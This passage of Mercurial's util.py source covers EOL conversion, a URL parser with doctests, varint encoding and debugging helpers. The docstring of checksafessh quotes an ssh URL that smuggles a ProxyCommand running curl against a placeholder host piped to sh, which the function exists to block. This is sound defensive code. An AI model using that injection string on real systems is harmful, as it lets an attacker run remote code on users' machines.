2773 2773 return fromline - 1, toline
2774 2774
2775 2775
2776 2776 bytecount = unitcountfn(
2777 2777 (100, 1 << 30, _(b'%.0f GB')),
2778 2778 (10, 1 << 30, _(b'%.1f GB')),
2779 2779 (1, 1 << 30, _(b'%.2f GB')),
2780 2780 (100, 1 << 20, _(b'%.0f MB')),
2781 2781 (10, 1 << 20, _(b'%.1f MB')),
2782 2782 (1, 1 << 20, _(b'%.2f MB')),
2783 2783 (100, 1 << 10, _(b'%.0f KB')),
2784 2784 (10, 1 << 10, _(b'%.1f KB')),
2785 2785 (1, 1 << 10, _(b'%.2f KB')),
2786 2786 (1, 1, _(b'%.0f bytes')),
2787 2787 )
2788 2788
2789 2789
2790 2790 class transformingwriter(object):
2791 2791 """Writable file wrapper to transform data by function"""
2792 2792
2793 2793 def __init__(self, fp, encode):
2794 2794 self._fp = fp
2795 2795 self._encode = encode
2796 2796
2797 2797 def close(self):
2798 2798 self._fp.close()
2799 2799
2800 2800 def flush(self):
2801 2801 self._fp.flush()
2802 2802
2803 2803 def write(self, data):
2804 2804 return self._fp.write(self._encode(data))
2805 2805
2806 2806
2807 2807 # Matches a single EOL which can either be a CRLF where repeated CR
2808 2808 # are removed or a LF. We do not care about old Macintosh files, so a
2809 2809 # stray CR is an error.
2810 2810 _eolre = remod.compile(br'\r*\n')
2811 2811
2812 2812
2813 2813 def tolf(s):
2814 2814 return _eolre.sub(b'\n', s)
2815 2815
2816 2816
2817 2817 def tocrlf(s):
2818 2818 return _eolre.sub(b'\r\n', s)
2819 2819
2820 2820
2821 2821 def _crlfwriter(fp):
2822 2822 return transformingwriter(fp, tocrlf)
2823 2823
2824 2824
2825 2825 if pycompat.oslinesep == b'\r\n':
2826 2826 tonativeeol = tocrlf
2827 2827 fromnativeeol = tolf
2828 2828 nativeeolwriter = _crlfwriter
2829 2829 else:
2830 2830 tonativeeol = pycompat.identity
2831 2831 fromnativeeol = pycompat.identity
2832 2832 nativeeolwriter = pycompat.identity
2833 2833
2834 2834 if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
2835 2835 3,
2836 2836 0,
2837 2837 ):
2838 2838 # There is an issue in CPython that some IO methods do not handle EINTR
2839 2839 # correctly. The following table shows what CPython version (and functions)
2840 2840 # are affected (buggy: has the EINTR bug, okay: otherwise):
2841 2841 #
2842 2842 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2843 2843 # --------------------------------------------------
2844 2844 # fp.__iter__ | buggy | buggy | okay
2845 2845 # fp.read* | buggy | okay [1] | okay
2846 2846 #
2847 2847 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2848 2848 #
2849 2849 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2850 2850 # like "read*" work fine, as we do not support Python < 2.7.4.
2851 2851 #
2852 2852 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2853 2853 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2854 2854 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2855 2855 # fp.__iter__ but not other fp.read* methods.
2856 2856 #
2857 2857 # On modern systems like Linux, the "read" syscall cannot be interrupted
2858 2858 # when reading "fast" files like on-disk files. So the EINTR issue only
2859 2859 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2860 2860 # files approximately as "fast" files and use the fast (unsafe) code path,
2861 2861 # to minimize the performance impact.
2862 2862
2863 2863 def iterfile(fp):
2864 2864 fastpath = True
2865 2865 if type(fp) is file:
2866 2866 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2867 2867 if fastpath:
2868 2868 return fp
2869 2869 else:
2870 2870 # fp.readline deals with EINTR correctly, use it as a workaround.
2871 2871 return iter(fp.readline, b'')
2872 2872
2873 2873
2874 2874 else:
2875 2875 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2876 2876 def iterfile(fp):
2877 2877 return fp
2878 2878
2879 2879
2880 2880 def iterlines(iterator):
2881 2881 for chunk in iterator:
2882 2882 for line in chunk.splitlines():
2883 2883 yield line
2884 2884
2885 2885
2886 2886 def expandpath(path):
2887 2887 return os.path.expanduser(os.path.expandvars(path))
2888 2888
2889 2889
2890 2890 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2891 2891 """Return the result of interpolating items in the mapping into string s.
2892 2892
2893 2893 prefix is a single character string, or a two character string with
2894 2894 a backslash as the first character if the prefix needs to be escaped in
2895 2895 a regular expression.
2896 2896
2897 2897 fn is an optional function that will be applied to the replacement text
2898 2898 just before replacement.
2899 2899
2900 2900 escape_prefix is an optional flag that allows using doubled prefix for
2901 2901 its escaping.
2902 2902 """
2903 2903 fn = fn or (lambda s: s)
2904 2904 patterns = b'|'.join(mapping.keys())
2905 2905 if escape_prefix:
2906 2906 patterns += b'|' + prefix
2907 2907 if len(prefix) > 1:
2908 2908 prefix_char = prefix[1:]
2909 2909 else:
2910 2910 prefix_char = prefix
2911 2911 mapping[prefix_char] = prefix_char
2912 2912 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2913 2913 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2914 2914
2915 2915
2916 2916 def getport(port):
2917 2917 """Return the port for a given network service.
2918 2918
2919 2919 If port is an integer, it's returned as is. If it's a string, it's
2920 2920 looked up using socket.getservbyname(). If there's no matching
2921 2921 service, error.Abort is raised.
2922 2922 """
2923 2923 try:
2924 2924 return int(port)
2925 2925 except ValueError:
2926 2926 pass
2927 2927
2928 2928 try:
2929 2929 return socket.getservbyname(pycompat.sysstr(port))
2930 2930 except socket.error:
2931 2931 raise error.Abort(
2932 2932 _(b"no port number associated with service '%s'") % port
2933 2933 )
2934 2934
2935 2935
2936 2936 class url(object):
2937 2937 r"""Reliable URL parser.
2938 2938
2939 2939 This parses URLs and provides attributes for the following
2940 2940 components:
2941 2941
2942 2942 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2943 2943
2944 2944 Missing components are set to None. The only exception is
2945 2945 fragment, which is set to '' if present but empty.
2946 2946
2947 2947 If parsefragment is False, fragment is included in query. If
2948 2948 parsequery is False, query is included in path. If both are
2949 2949 False, both fragment and query are included in path.
2950 2950
2951 2951 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2952 2952
2953 2953 Note that for backward compatibility reasons, bundle URLs do not
2954 2954 take host names. That means 'bundle://../' has a path of '../'.
2955 2955
2956 2956 Examples:
2957 2957
2958 2958 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2959 2959 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2960 2960 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2961 2961 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2962 2962 >>> url(b'file:///home/joe/repo')
2963 2963 <url scheme: 'file', path: '/home/joe/repo'>
2964 2964 >>> url(b'file:///c:/temp/foo/')
2965 2965 <url scheme: 'file', path: 'c:/temp/foo/'>
2966 2966 >>> url(b'bundle:foo')
2967 2967 <url scheme: 'bundle', path: 'foo'>
2968 2968 >>> url(b'bundle://../foo')
2969 2969 <url scheme: 'bundle', path: '../foo'>
2970 2970 >>> url(br'c:\foo\bar')
2971 2971 <url path: 'c:\\foo\\bar'>
2972 2972 >>> url(br'\\blah\blah\blah')
2973 2973 <url path: '\\\\blah\\blah\\blah'>
2974 2974 >>> url(br'\\blah\blah\blah#baz')
2975 2975 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2976 2976 >>> url(br'file:///C:\users\me')
2977 2977 <url scheme: 'file', path: 'C:\\users\\me'>
2978 2978
2979 2979 Authentication credentials:
2980 2980
2981 2981 >>> url(b'ssh://joe:xyz@x/repo')
2982 2982 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2983 2983 >>> url(b'ssh://joe@x/repo')
2984 2984 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2985 2985
2986 2986 Query strings and fragments:
2987 2987
2988 2988 >>> url(b'http://host/a?b#c')
2989 2989 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2990 2990 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2991 2991 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2992 2992
2993 2993 Empty path:
2994 2994
2995 2995 >>> url(b'')
2996 2996 <url path: ''>
2997 2997 >>> url(b'#a')
2998 2998 <url path: '', fragment: 'a'>
2999 2999 >>> url(b'http://host/')
3000 3000 <url scheme: 'http', host: 'host', path: ''>
3001 3001 >>> url(b'http://host/#a')
3002 3002 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3003 3003
3004 3004 Only scheme:
3005 3005
3006 3006 >>> url(b'http:')
3007 3007 <url scheme: 'http'>
3008 3008 """
3009 3009
3010 3010 _safechars = b"!~*'()+"
3011 3011 _safepchars = b"/!~*'()+:\\"
3012 3012 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3013 3013
3014 3014 def __init__(self, path, parsequery=True, parsefragment=True):
3015 3015 # We slowly chomp away at path until we have only the path left
3016 3016 self.scheme = self.user = self.passwd = self.host = None
3017 3017 self.port = self.path = self.query = self.fragment = None
3018 3018 self._localpath = True
3019 3019 self._hostport = b''
3020 3020 self._origpath = path
3021 3021
3022 3022 if parsefragment and b'#' in path:
3023 3023 path, self.fragment = path.split(b'#', 1)
3024 3024
3025 3025 # special case for Windows drive letters and UNC paths
3026 3026 if hasdriveletter(path) or path.startswith(b'\\\\'):
3027 3027 self.path = path
3028 3028 return
3029 3029
3030 3030 # For compatibility reasons, we can't handle bundle paths as
3031 3031 # normal URLS
3032 3032 if path.startswith(b'bundle:'):
3033 3033 self.scheme = b'bundle'
3034 3034 path = path[7:]
3035 3035 if path.startswith(b'//'):
3036 3036 path = path[2:]
3037 3037 self.path = path
3038 3038 return
3039 3039
3040 3040 if self._matchscheme(path):
3041 3041 parts = path.split(b':', 1)
3042 3042 if parts[0]:
3043 3043 self.scheme, path = parts
3044 3044 self._localpath = False
3045 3045
3046 3046 if not path:
3047 3047 path = None
3048 3048 if self._localpath:
3049 3049 self.path = b''
3050 3050 return
3051 3051 else:
3052 3052 if self._localpath:
3053 3053 self.path = path
3054 3054 return
3055 3055
3056 3056 if parsequery and b'?' in path:
3057 3057 path, self.query = path.split(b'?', 1)
3058 3058 if not path:
3059 3059 path = None
3060 3060 if not self.query:
3061 3061 self.query = None
3062 3062
3063 3063 # // is required to specify a host/authority
3064 3064 if path and path.startswith(b'//'):
3065 3065 parts = path[2:].split(b'/', 1)
3066 3066 if len(parts) > 1:
3067 3067 self.host, path = parts
3068 3068 else:
3069 3069 self.host = parts[0]
3070 3070 path = None
3071 3071 if not self.host:
3072 3072 self.host = None
3073 3073 # path of file:///d is /d
3074 3074 # path of file:///d:/ is d:/, not /d:/
3075 3075 if path and not hasdriveletter(path):
3076 3076 path = b'/' + path
3077 3077
3078 3078 if self.host and b'@' in self.host:
3079 3079 self.user, self.host = self.host.rsplit(b'@', 1)
3080 3080 if b':' in self.user:
3081 3081 self.user, self.passwd = self.user.split(b':', 1)
3082 3082 if not self.host:
3083 3083 self.host = None
3084 3084
3085 3085 # Don't split on colons in IPv6 addresses without ports
3086 3086 if (
3087 3087 self.host
3088 3088 and b':' in self.host
3089 3089 and not (
3090 3090 self.host.startswith(b'[') and self.host.endswith(b']')
3091 3091 )
3092 3092 ):
3093 3093 self._hostport = self.host
3094 3094 self.host, self.port = self.host.rsplit(b':', 1)
3095 3095 if not self.host:
3096 3096 self.host = None
3097 3097
3098 3098 if (
3099 3099 self.host
3100 3100 and self.scheme == b'file'
3101 3101 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3102 3102 ):
3103 3103 raise error.Abort(
3104 3104 _(b'file:// URLs can only refer to localhost')
3105 3105 )
3106 3106
3107 3107 self.path = path
3108 3108
3109 3109 # leave the query string escaped
3110 3110 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3111 3111 v = getattr(self, a)
3112 3112 if v is not None:
3113 3113 setattr(self, a, urlreq.unquote(v))
3114 3114
3115 3115 @encoding.strmethod
3116 3116 def __repr__(self):
3117 3117 attrs = []
3118 3118 for a in (
3119 3119 b'scheme',
3120 3120 b'user',
3121 3121 b'passwd',
3122 3122 b'host',
3123 3123 b'port',
3124 3124 b'path',
3125 3125 b'query',
3126 3126 b'fragment',
3127 3127 ):
3128 3128 v = getattr(self, a)
3129 3129 if v is not None:
3130 3130 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3131 3131 return b'<url %s>' % b', '.join(attrs)
3132 3132
3133 3133 def __bytes__(self):
3134 3134 r"""Join the URL's components back into a URL string.
3135 3135
3136 3136 Examples:
3137 3137
3138 3138 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3139 3139 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3140 3140 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3141 3141 'http://user:pw@host:80/?foo=bar&baz=42'
3142 3142 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3143 3143 'http://user:pw@host:80/?foo=bar%3dbaz'
3144 3144 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3145 3145 'ssh://user:pw@[::1]:2200//home/joe#'
3146 3146 >>> bytes(url(b'http://localhost:80//'))
3147 3147 'http://localhost:80//'
3148 3148 >>> bytes(url(b'http://localhost:80/'))
3149 3149 'http://localhost:80/'
3150 3150 >>> bytes(url(b'http://localhost:80'))
3151 3151 'http://localhost:80/'
3152 3152 >>> bytes(url(b'bundle:foo'))
3153 3153 'bundle:foo'
3154 3154 >>> bytes(url(b'bundle://../foo'))
3155 3155 'bundle:../foo'
3156 3156 >>> bytes(url(b'path'))
3157 3157 'path'
3158 3158 >>> bytes(url(b'file:///tmp/foo/bar'))
3159 3159 'file:///tmp/foo/bar'
3160 3160 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3161 3161 'file:///c:/tmp/foo/bar'
3162 3162 >>> print(url(br'bundle:foo\bar'))
3163 3163 bundle:foo\bar
3164 3164 >>> print(url(br'file:///D:\data\hg'))
3165 3165 file:///D:\data\hg
3166 3166 """
3167 3167 if self._localpath:
3168 3168 s = self.path
3169 3169 if self.scheme == b'bundle':
3170 3170 s = b'bundle:' + s
3171 3171 if self.fragment:
3172 3172 s += b'#' + self.fragment
3173 3173 return s
3174 3174
3175 3175 s = self.scheme + b':'
3176 3176 if self.user or self.passwd or self.host:
3177 3177 s += b'//'
3178 3178 elif self.scheme and (
3179 3179 not self.path
3180 3180 or self.path.startswith(b'/')
3181 3181 or hasdriveletter(self.path)
3182 3182 ):
3183 3183 s += b'//'
3184 3184 if hasdriveletter(self.path):
3185 3185 s += b'/'
3186 3186 if self.user:
3187 3187 s += urlreq.quote(self.user, safe=self._safechars)
3188 3188 if self.passwd:
3189 3189 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3190 3190 if self.user or self.passwd:
3191 3191 s += b'@'
3192 3192 if self.host:
3193 3193 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3194 3194 s += urlreq.quote(self.host)
3195 3195 else:
3196 3196 s += self.host
3197 3197 if self.port:
3198 3198 s += b':' + urlreq.quote(self.port)
3199 3199 if self.host:
3200 3200 s += b'/'
3201 3201 if self.path:
3202 3202 # TODO: similar to the query string, we should not unescape the
3203 3203 # path when we store it, the path might contain '%2f' = '/',
3204 3204 # which we should *not* escape.
3205 3205 s += urlreq.quote(self.path, safe=self._safepchars)
3206 3206 if self.query:
3207 3207 # we store the query in escaped form.
3208 3208 s += b'?' + self.query
3209 3209 if self.fragment is not None:
3210 3210 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3211 3211 return s
3212 3212
3213 3213 __str__ = encoding.strmethod(__bytes__)
3214 3214
3215 3215 def authinfo(self):
3216 3216 user, passwd = self.user, self.passwd
3217 3217 try:
3218 3218 self.user, self.passwd = None, None
3219 3219 s = bytes(self)
3220 3220 finally:
3221 3221 self.user, self.passwd = user, passwd
3222 3222 if not self.user:
3223 3223 return (s, None)
3224 3224 # authinfo[1] is passed to urllib2 password manager, and its
3225 3225 # URIs must not contain credentials. The host is passed in the
3226 3226 # URIs list because Python < 2.4.3 uses only that to search for
3227 3227 # a password.
3228 3228 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3229 3229
3230 3230 def isabs(self):
3231 3231 if self.scheme and self.scheme != b'file':
3232 3232 return True # remote URL
3233 3233 if hasdriveletter(self.path):
3234 3234 return True # absolute for our purposes - can't be joined()
3235 3235 if self.path.startswith(br'\\'):
3236 3236 return True # Windows UNC path
3237 3237 if self.path.startswith(b'/'):
3238 3238 return True # POSIX-style
3239 3239 return False
3240 3240
3241 3241 def localpath(self):
3242 3242 if self.scheme == b'file' or self.scheme == b'bundle':
3243 3243 path = self.path or b'/'
3244 3244 # For Windows, we need to promote hosts containing drive
3245 3245 # letters to paths with drive letters.
3246 3246 if hasdriveletter(self._hostport):
3247 3247 path = self._hostport + b'/' + self.path
3248 3248 elif (
3249 3249 self.host is not None and self.path and not hasdriveletter(path)
3250 3250 ):
3251 3251 path = b'/' + path
3252 3252 return path
3253 3253 return self._origpath
3254 3254
3255 3255 def islocal(self):
3256 3256 '''whether localpath will return something that posixfile can open'''
3257 3257 return (
3258 3258 not self.scheme
3259 3259 or self.scheme == b'file'
3260 3260 or self.scheme == b'bundle'
3261 3261 )
3262 3262
3263 3263
3264 3264 def hasscheme(path):
3265 3265 return bool(url(path).scheme)
3266 3266
3267 3267
3268 3268 def hasdriveletter(path):
3269 3269 return path and path[1:2] == b':' and path[0:1].isalpha()
3270 3270
3271 3271
3272 3272 def urllocalpath(path):
3273 3273 return url(path, parsequery=False, parsefragment=False).localpath()
3274 3274
3275 3275
3276 3276 def checksafessh(path):
3277 3277 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3278 3278
3279 3279 This is a sanity check for ssh urls. ssh will parse the first item as
3280 3280 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3281 3281 Let's prevent these potentially exploited urls entirely and warn the
3282 3282 user.
3283 3283
3284 3284 Raises an error.Abort when the url is unsafe.
3285 3285 """
3286 3286 path = urlreq.unquote(path)
3287 3287 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3288 3288 raise error.Abort(
3289 3289 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3290 3290 )
3291 3291
3292 3292
3293 3293 def hidepassword(u):
3294 3294 '''hide user credential in a url string'''
3295 3295 u = url(u)
3296 3296 if u.passwd:
3297 3297 u.passwd = b'***'
3298 3298 return bytes(u)
3299 3299
3300 3300
3301 3301 def removeauth(u):
3302 3302 '''remove all authentication information from a url string'''
3303 3303 u = url(u)
3304 3304 u.user = u.passwd = None
3305 3305 return bytes(u)
3306 3306
3307 3307
3308 3308 timecount = unitcountfn(
3309 3309 (1, 1e3, _(b'%.0f s')),
3310 3310 (100, 1, _(b'%.1f s')),
3311 3311 (10, 1, _(b'%.2f s')),
3312 3312 (1, 1, _(b'%.3f s')),
3313 3313 (100, 0.001, _(b'%.1f ms')),
3314 3314 (10, 0.001, _(b'%.2f ms')),
3315 3315 (1, 0.001, _(b'%.3f ms')),
3316 3316 (100, 0.000001, _(b'%.1f us')),
3317 3317 (10, 0.000001, _(b'%.2f us')),
3318 3318 (1, 0.000001, _(b'%.3f us')),
3319 3319 (100, 0.000000001, _(b'%.1f ns')),
3320 3320 (10, 0.000000001, _(b'%.2f ns')),
3321 3321 (1, 0.000000001, _(b'%.3f ns')),
3322 3322 )
3323 3323
3324 3324
3325 3325 @attr.s
3326 3326 class timedcmstats(object):
3327 3327 """Stats information produced by the timedcm context manager on entering."""
3328 3328
3329 3329 # the starting value of the timer as a float (meaning and resulution is
3330 3330 # platform dependent, see util.timer)
3331 3331 start = attr.ib(default=attr.Factory(lambda: timer()))
3332 3332 # the number of seconds as a floating point value; starts at 0, updated when
3333 3333 # the context is exited.
3334 3334 elapsed = attr.ib(default=0)
3335 3335 # the number of nested timedcm context managers.
3336 3336 level = attr.ib(default=1)
3337 3337
3338 3338 def __bytes__(self):
3339 3339 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3340 3340
3341 3341 __str__ = encoding.strmethod(__bytes__)
3342 3342
3343 3343
3344 3344 @contextlib.contextmanager
3345 3345 def timedcm(whencefmt, *whenceargs):
3346 3346 """A context manager that produces timing information for a given context.
3347 3347
3348 3348 On entering a timedcmstats instance is produced.
3349 3349
3350 3350 This context manager is reentrant.
3351 3351
3352 3352 """
3353 3353 # track nested context managers
3354 3354 timedcm._nested += 1
3355 3355 timing_stats = timedcmstats(level=timedcm._nested)
3356 3356 try:
3357 3357 with tracing.log(whencefmt, *whenceargs):
3358 3358 yield timing_stats
3359 3359 finally:
3360 3360 timing_stats.elapsed = timer() - timing_stats.start
3361 3361 timedcm._nested -= 1
3362 3362
3363 3363
3364 3364 timedcm._nested = 0
3365 3365
3366 3366
3367 3367 def timed(func):
3368 3368 '''Report the execution time of a function call to stderr.
3369 3369
3370 3370 During development, use as a decorator when you need to measure
3371 3371 the cost of a function, e.g. as follows:
3372 3372
3373 3373 @util.timed
3374 3374 def foo(a, b, c):
3375 3375 pass
3376 3376 '''
3377 3377
3378 3378 def wrapper(*args, **kwargs):
3379 3379 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3380 3380 result = func(*args, **kwargs)
3381 3381 stderr = procutil.stderr
3382 3382 stderr.write(
3383 3383 b'%s%s: %s\n'
3384 3384 % (
3385 3385 b' ' * time_stats.level * 2,
3386 3386 pycompat.bytestr(func.__name__),
3387 3387 time_stats,
3388 3388 )
3389 3389 )
3390 3390 return result
3391 3391
3392 3392 return wrapper
3393 3393
3394 3394
3395 3395 _sizeunits = (
3396 3396 (b'm', 2 ** 20),
3397 3397 (b'k', 2 ** 10),
3398 3398 (b'g', 2 ** 30),
3399 3399 (b'kb', 2 ** 10),
3400 3400 (b'mb', 2 ** 20),
3401 3401 (b'gb', 2 ** 30),
3402 3402 (b'b', 1),
3403 3403 )
3404 3404
3405 3405
3406 3406 def sizetoint(s):
3407 3407 '''Convert a space specifier to a byte count.
3408 3408
3409 3409 >>> sizetoint(b'30')
3410 3410 30
3411 3411 >>> sizetoint(b'2.2kb')
3412 3412 2252
3413 3413 >>> sizetoint(b'6M')
3414 3414 6291456
3415 3415 '''
3416 3416 t = s.strip().lower()
3417 3417 try:
3418 3418 for k, u in _sizeunits:
3419 3419 if t.endswith(k):
3420 3420 return int(float(t[: -len(k)]) * u)
3421 3421 return int(t)
3422 3422 except ValueError:
3423 3423 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3424 3424
3425 3425
3426 3426 class hooks(object):
3427 3427 '''A collection of hook functions that can be used to extend a
3428 3428 function's behavior. Hooks are called in lexicographic order,
3429 3429 based on the names of their sources.'''
3430 3430
3431 3431 def __init__(self):
3432 3432 self._hooks = []
3433 3433
3434 3434 def add(self, source, hook):
3435 3435 self._hooks.append((source, hook))
3436 3436
3437 3437 def __call__(self, *args):
3438 3438 self._hooks.sort(key=lambda x: x[0])
3439 3439 results = []
3440 3440 for source, hook in self._hooks:
3441 3441 results.append(hook(*args))
3442 3442 return results
3443 3443
3444 3444
3445 3445 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3446 3446 '''Yields lines for a nicely formatted stacktrace.
3447 3447 Skips the 'skip' last entries, then return the last 'depth' entries.
3448 3448 Each file+linenumber is formatted according to fileline.
3449 3449 Each line is formatted according to line.
3450 3450 If line is None, it yields:
3451 3451 length of longest filepath+line number,
3452 3452 filepath+linenumber,
3453 3453 function
3454 3454
3455 3455 Not be used in production code but very convenient while developing.
3456 3456 '''
3457 3457 entries = [
3458 3458 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3459 3459 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3460 3460 ][-depth:]
3461 3461 if entries:
3462 3462 fnmax = max(len(entry[0]) for entry in entries)
3463 3463 for fnln, func in entries:
3464 3464 if line is None:
3465 3465 yield (fnmax, fnln, func)
3466 3466 else:
3467 3467 yield line % (fnmax, fnln, func)
3468 3468
3469 3469
3470 3470 def debugstacktrace(
3471 3471 msg=b'stacktrace',
3472 3472 skip=0,
3473 3473 f=procutil.stderr,
3474 3474 otherf=procutil.stdout,
3475 3475 depth=0,
3476 3476 prefix=b'',
3477 3477 ):
3478 3478 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3479 3479 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3480 3480 By default it will flush stdout first.
3481 3481 It can be used everywhere and intentionally does not require an ui object.
3482 3482 Not be used in production code but very convenient while developing.
3483 3483 '''
3484 3484 if otherf:
3485 3485 otherf.flush()
3486 3486 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3487 3487 for line in getstackframes(skip + 1, depth=depth):
3488 3488 f.write(prefix + line)
3489 3489 f.flush()
3490 3490
3491 3491
3492 3492 # convenient shortcut
3493 3493 dst = debugstacktrace
3494 3494
3495 3495
3496 3496 def safename(f, tag, ctx, others=None):
3497 3497 """
3498 3498 Generate a name that it is safe to rename f to in the given context.
3499 3499
3500 3500 f: filename to rename
3501 3501 tag: a string tag that will be included in the new name
3502 3502 ctx: a context, in which the new name must not exist
3503 3503 others: a set of other filenames that the new name must not be in
3504 3504
3505 3505 Returns a file name of the form oldname~tag[~number] which does not exist
3506 3506 in the provided context and is not in the set of other names.
3507 3507 """
3508 3508 if others is None:
3509 3509 others = set()
3510 3510
3511 3511 fn = b'%s~%s' % (f, tag)
3512 3512 if fn not in ctx and fn not in others:
3513 3513 return fn
3514 3514 for n in itertools.count(1):
3515 3515 fn = b'%s~%s~%s' % (f, tag, n)
3516 3516 if fn not in ctx and fn not in others:
3517 3517 return fn
3518 3518
3519 3519
3520 3520 def readexactly(stream, n):
3521 3521 '''read n bytes from stream.read and abort if less was available'''
3522 3522 s = stream.read(n)
3523 3523 if len(s) < n:
3524 3524 raise error.Abort(
3525 3525 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3526 3526 % (len(s), n)
3527 3527 )
3528 3528 return s
3529 3529
3530 3530
3531 3531 def uvarintencode(value):
3532 3532 """Encode an unsigned integer value to a varint.
3533 3533
3534 3534 A varint is a variable length integer of 1 or more bytes. Each byte
3535 3535 except the last has the most significant bit set. The lower 7 bits of
3536 3536 each byte store the 2's complement representation, least significant group
3537 3537 first.
3538 3538
3539 3539 >>> uvarintencode(0)
3540 3540 '\\x00'
3541 3541 >>> uvarintencode(1)
3542 3542 '\\x01'
3543 3543 >>> uvarintencode(127)
3544 3544 '\\x7f'
3545 3545 >>> uvarintencode(1337)
3546 3546 '\\xb9\\n'
3547 3547 >>> uvarintencode(65536)
3548 3548 '\\x80\\x80\\x04'
3549 3549 >>> uvarintencode(-1)
3550 3550 Traceback (most recent call last):
3551 3551 ...
3552 3552 ProgrammingError: negative value for uvarint: -1
3553 3553 """
3554 3554 if value < 0:
3555 3555 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3556 3556 bits = value & 0x7F
3557 3557 value >>= 7
3558 3558 bytes = []
3559 3559 while value:
3560 3560 bytes.append(pycompat.bytechr(0x80 | bits))
3561 3561 bits = value & 0x7F
3562 3562 value >>= 7
3563 3563 bytes.append(pycompat.bytechr(bits))
3564 3564
3565 3565 return b''.join(bytes)
3566 3566
3567 3567
3568 3568 def uvarintdecodestream(fh):
3569 3569 """Decode an unsigned variable length integer from a stream.
3570 3570
3571 3571 The passed argument is anything that has a ``.read(N)`` method.
3572 3572
3573 3573 >>> try:
3574 3574 ... from StringIO import StringIO as BytesIO
3575 3575 ... except ImportError:
3576 3576 ... from io import BytesIO
3577 3577 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3578 3578 0
3579 3579 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3580 3580 1
3581 3581 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3582 3582 127
3583 3583 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3584 3584 1337
3585 3585 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3586 3586 65536
3587 3587 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3588 3588 Traceback (most recent call last):
3589 3589 ...
3590 3590 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3591 3591 """
3592 3592 result = 0
3593 3593 shift = 0
3594 3594 while True:
3595 3595 byte = ord(readexactly(fh, 1))
3596 3596 result |= (byte & 0x7F) << shift
3597 3597 if not (byte & 0x80):
3598 3598 return result
3599 3599 shift += 7
3600 3600
3601 3601
3602 3602 # Passing the '' locale means that the locale should be set according to the
3603 3603 # user settings (environment variables).
3604 3604 # Python sometimes avoids setting the global locale settings. When interfacing
3605 3605 # with C code (e.g. the curses module or the Subversion bindings), the global
3606 3606 # locale settings must be initialized correctly. Python 2 does not initialize
3607 3607 # the global locale settings on interpreter startup. Python 3 sometimes
3608 3608 # initializes LC_CTYPE, but not consistently at least on Windows. Therefore we
3609 3609 # explicitly initialize it to get consistent behavior if it's not already
3610 3610 # initialized. Since CPython commit 177d921c8c03d30daa32994362023f777624b10d,
3611 3611 # LC_CTYPE is always initialized. If we require Python 3.8+, we should re-check
3612 3612 # if we can remove this code.
3613 3613 @contextlib.contextmanager
3614 3614 def with_lc_ctype():
3615 3615 oldloc = locale.setlocale(locale.LC_CTYPE, None)
3616 3616 if oldloc == 'C':
3617 3617 try:
3618 3618 try:
3619 3619 locale.setlocale(locale.LC_CTYPE, '')
